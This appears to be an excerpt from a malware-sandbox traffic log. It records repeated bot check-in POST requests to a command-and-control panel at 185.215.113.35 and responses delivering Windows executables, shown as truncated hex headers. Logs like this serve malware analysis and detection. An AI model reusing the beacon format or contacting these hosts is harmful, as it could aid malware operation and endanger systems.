                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:48 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 52 69 63 68 76 15 69 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 e8 62 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 01 00 00 f6 03 00 00 00 00 00 9f 2d 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:52 GMTContent-Type: application/x-msdos-programContent-Length: 322560Connection: closeLast-Modified: Fri, 14 Jan 2022 09:43:01 GMTETag: "4ec00-5d587a0fd00a8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 fa 3c cc e1 9b 52 9f e1 9b 52 9f e1 9b 52 9f ff c9 c7 9f fb 9b 52 9f ff c9 d1 9f 67 9b 52 9f c6 5d 29 9f e2 9b 52 9f e1 9b 53 9f 01 9b 52 9f ff c9 d6 9f db 9b 52 9f ff c9 c6 9f e0 9b 52 9f ff c9 c3 9f e0 9b 52 9f 52 69 63 68 e1 9b 52 9f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 39 c1 2d 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 f2 03 00 00 a8 11 00 00 00 00 00 00 c1 01 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 15 00 00 04 00 00 12 06 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 ee 03 00 28 00 00 00 00 10 15 00 b8 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 15 00 f4 1d 00 00 90 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 91 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 f1 03 00 00 10 00 00 00 f2 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 c9 10 00 00 10 04 00 00 18 00 00 00 f6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 61 76 65 00 00 00 05 00 00 00 00 e0 14 00 00 02 00 00 00 0e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 6f 64 75 66 00 00 ea 00 00 00 00 f0 14 00 00 02 00 00 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 61 66 61 6c 00 00 93 0d 00 00 00 00 15 00 00 0e 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 83 00 00 00 10 15 00 00 84 00 00 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 64 46 00 00 00 a0 15 00 00 48 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:25 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:31 GMTContent-Type: application/x-msdos-programContent-Length: 373760Connection: closeLast-Modified: Wed, 12 Jan 2022 08:30:43 GMTETag: "5b400-5d55e62ba577e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6c cb d2 55 28 aa bc 06 28 aa bc 06 28 aa bc 06 36 f8 29 06 31 aa bc 06 36 f8 3f 06 57 aa bc 06 0f 6c c7 06 2b aa bc 06 28 aa bd 06 f5 aa bc 06 36 f8 38 06 11 aa bc 06 36 f8 28 06 29 aa bc 06 36 f8 2d 06 29 aa bc 06 52 69 63 68 28 aa bc 06 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 61 a2 52 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 c2 04 00 00 76 12 00 00 00 00 00 40 a1 02 00 00 10 00 00 00 e0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 17 00 00 04 00 00 e2 26 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 be 04 00 28 00 00 00 00 b0 16 00 10 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 17 00 14 1d 00 00 80 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 8f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 c1 04 00 00 10 00 00 00 c2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 bc 9f 11 00 00 e0 04 00 00 18 00 00 00 c6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 69 7a 69 00 00 00 05 00 00 00 00 80 16 00 00 02 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 75 72 00 00 00 00 ea 00 00 00 00 90 16 00 00 02 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 6f 62 00 00 00 00 93 0d 00 00 00 a0 16 00 00 0e 00 00 00 e2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 7b 00 00 00 b0 16 00 00 7c 00 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 46 00 00 00 30 17 00 00 48 00 00 00 6c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Jan 2022 09:44:50 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:58 GMTETag: "61d8c846-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:55 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 